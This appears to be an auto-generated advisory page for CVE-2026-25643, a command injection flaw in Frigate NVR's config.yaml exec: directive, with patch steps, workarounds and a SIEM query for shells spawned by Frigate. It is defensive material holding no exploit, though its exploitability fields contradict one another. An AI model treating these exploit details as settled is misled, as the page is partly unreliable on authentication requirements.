CVE-2026-25643 – CVE-2026-25643 is a critical Remote Command Exe... (How to Fix)

Q: What is the severity of CVE-2026-25643?

CVE-2026-25643 has a CVSS score of 9.1 (CRITICAL). CVE-2026-25643 is a critical Remote Command Execution vulnerability in Frigate NVR software that allows attackers to execute arbitrary system commands via unsanitized input in video stream configuration. Only administrators or users who expose Frigate to the internet without authentication are affected. The vulnerability stems from improper input sanitization in the exec: directive of config.yaml.

📋 TL;DR

CVE-2026-25643 is a critical Remote Command Execution vulnerability in Frigate NVR software that allows attackers to execute arbitrary system commands via unsanitized input in video stream configuration. Only administrators or users who expose Frigate to the internet without authentication are affected. The vulnerability stems from improper input sanitization in the exec: directive of config.yaml.

💻 Affected Systems

Products:

Frigate NVR

Versions: All versions prior to 0.16.4

Operating Systems: All platforms running Frigate

Default Config Vulnerable: ✅ No

Notes: Only vulnerable when exec: directive is used in config.yaml and system is exposed without authentication.

📦 What is this software?

Frigate by Frigate

View all CVEs affecting Frigate →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attackers to execute arbitrary commands, install malware, exfiltrate data, or pivot to other network systems.

🟠

Likely Case

Attackers gaining shell access to the Frigate host system, potentially compromising the entire NVR system and connected cameras.

🟢

If Mitigated

No impact if proper authentication is enabled and the system is not exposed to untrusted networks.

🌐 Internet-Facing: HIGH - Systems exposed to the internet without authentication are fully vulnerable to remote exploitation.

🏢 Internal Only: LOW - Requires administrative access or exposure to internal attackers who can modify configuration files.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires access to modify config.yaml, which typically requires administrative access or exposure without authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.16.4

Vendor Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Restart Required: Yes

Instructions:

1. Backup your config.yaml. 2. Stop Frigate service. 3. Update to version 0.16.4 using your package manager or manual installation. 4. Restart Frigate service. 5. Verify the update was successful.

🔧 Temporary Workarounds

Disable exec directive

all

Remove or comment out any exec: directives in config.yaml to prevent command injection.

# Edit config.yaml and remove lines containing 'exec:'

Enable authentication

all

Configure Frigate authentication to prevent unauthorized access to configuration.

# Configure authentication in Frigate settings

🧯 If You Can't Patch

Implement strict network segmentation and firewall rules to prevent external access to Frigate.
Enable authentication and use strong credentials if Frigate must be accessible.

🔍 How to Verify

Check if Vulnerable:

Check if Frigate version is below 0.16.4 and if config.yaml contains exec: directives.

Check Version:

docker exec frigate cat /VERSION 2>/dev/null || grep version /config/config.yaml

Verify Fix Applied:

Verify Frigate version is 0.16.4 or higher and test that exec: directives are properly sanitized.

📡 Detection & Monitoring

Log Indicators:

Unusual command execution in system logs
Unauthorized modifications to config.yaml
Unexpected processes spawned by Frigate

Network Indicators:

Unusual outbound connections from Frigate host
Suspicious traffic to/from Frigate web interface

SIEM Query:

process.name:sh OR process.name:bash AND parent.name:frigate OR parent.name:go2rtc

📊 Metadata

CVE ID: CVE-2026-25643

CVSS v3 Score: 9.1 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-78

EPSS Score: 0.94% exploit probability (75.8th percentile)

Published: February 6, 2026

Last Updated: February 11, 2026

🔗 References

https://github.com/blakeblackshear/frigate/releases/tag/v0.16.4 Release Notes
https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x Vendor Advisory,Exploit
https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x Vendor Advisory,Exploit

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-25643, you might also want to check these: